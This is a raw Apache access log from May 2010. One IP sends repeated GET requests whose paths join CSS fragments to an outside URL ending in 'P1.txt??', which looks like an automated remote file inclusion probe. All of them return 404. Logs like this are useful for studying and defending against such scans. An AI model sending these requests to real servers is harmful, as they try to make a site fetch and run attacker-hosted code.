76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /%09background-repeat:%20no-repeat;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/access_log.1272067200/%09background-repeat:%20no-repeat;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 396 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/%09background-repeat:%20no-repeat;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /%09margin-bottom:%2040px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/access_log.1272067200/%09margin-bottom:%2040px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/%09margin-bottom:%2040px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /%09padding-top:%205px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
